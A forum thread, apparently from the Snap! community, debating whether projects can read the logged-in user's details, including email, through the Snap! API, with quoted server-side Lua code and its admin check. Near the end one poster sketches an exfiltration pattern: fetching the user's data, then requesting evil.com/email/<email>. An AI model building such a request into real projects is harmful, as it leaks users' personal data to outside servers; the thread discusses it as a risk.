Son of <green flag is being clicked any way?> block

It accesses a Snap! API page that gives some information about the currently logged in user, which includes your verified status, username, and user ID. There's also a slightly more complicated method which can get the user's join date, project count, and email address. (All with the url block.)

Hmm that's wrong. Especially the email part.

That's the problem. You need to run projects on a separate domain.

I know it was changed, because the email used to be stored here https://snap.berkeley.edu/api/v1/users/c, but I guess they just moved it to some other part of the api.

In user.lua:

user = function (self)
    -- GET /users/:username
    -- Description: Get info about a user
    if not users_match(self) then assert_admin(self) end
    return jsonResponse(
        db.query(
            [[SELECT
                users.username, users.created, users.role, users.email,/*whoops email*/
                users.verified, users.id, count(projects.projectname)
                    AS project_count
            FROM active_users AS users
            LEFT JOIN active_projects AS projects
                ON projects.username = users.username
            WHERE users.username = ?
            GROUP BY
                users.username, users.created, users.role, users.email,
                users.verified, users.id]],
            self.params.username
        )[1]
    )
end,

/c has never returned an email.

OTOH, this gives information about the currently logged in user, so I can't see the security breach anywhere. It's a way for Snap! to verify who's logged in.

Read the assert above, will you? If you're asking this about a user that's not yourself, then you need to be an admin to get it.

The /user call gives you back all user info, but only about your user. If you think reading back your own email is a security breach, then I don't know what to tell you.

[rant]
Now that JS functions are behind a setting are you all trying to break the cloud using the URL block? I wish people put as much effort into learning actual computer science with Snap!... :frowning:
[/rant]

In theory, a project could read a user's email and send it to a remote server.
Something like

GET /api/v1/users/c
GET evil.com/email/<email>

yep
see Hazard - #9 by earthrulerr

This topic was automatically closed 30 days after the last reply. New replies are no longer allowed.